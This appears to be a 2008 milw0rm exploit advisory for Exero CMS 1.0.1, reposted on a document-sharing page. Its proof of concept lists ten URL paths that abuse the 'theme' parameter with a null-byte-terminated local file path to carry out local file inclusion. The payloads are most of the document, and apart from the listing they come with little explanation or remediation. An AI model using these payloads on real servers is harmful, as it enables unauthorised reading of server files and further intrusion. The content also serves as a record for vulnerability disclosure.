Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
2 Script : http://switch.dl.sourceforge.net/sourceforge/exerocms/Exero_CMS_1−0−1.rar
3 Home Page : http://ecms.getox.net/
4 POC :
5
6       /Exero_CMS_1−0−1/themes/Default/usercp/index.php?theme=Local File %00
7       /Exero_CMS_1−0−1/themes/Default/usercp/editpassword.php?theme=Local File %00
8       /Exero_CMS_1−0−1/themes/Default/usercp/avatar.php?theme=Local File %00
9       /Exero_CMS_1−0−1/themes/Default/custompage.php?theme=Local File %00
10       /Exero_CMS_1−0−1/themes/Default/errors/404.php?theme=Local File %00
11       /Exero_CMS_1−0−1/themes/Default/members/memberslist.php?theme=Local File %00
12       /Exero_CMS_1−0−1/themes/Default/members/profile.php?theme=Local File %00
13       /Exero_CMS_1−0−1/themes/Default/news/index.php?theme=Local File %00
14       /Exero_CMS_1−0−1/themes/Default/news/fullview.php?theme=Local File %00
15       /Exero_CMS_1−0−1/themes/Default/nopermission.php?theme=Local File %00
16
17 # milw0rm.com [2008−03−17]
Page 1/1
Exero CMS 1.0.1 theme Multiple Local File Inclusion Vulnerabilities
GoLd_M
03/17/2008
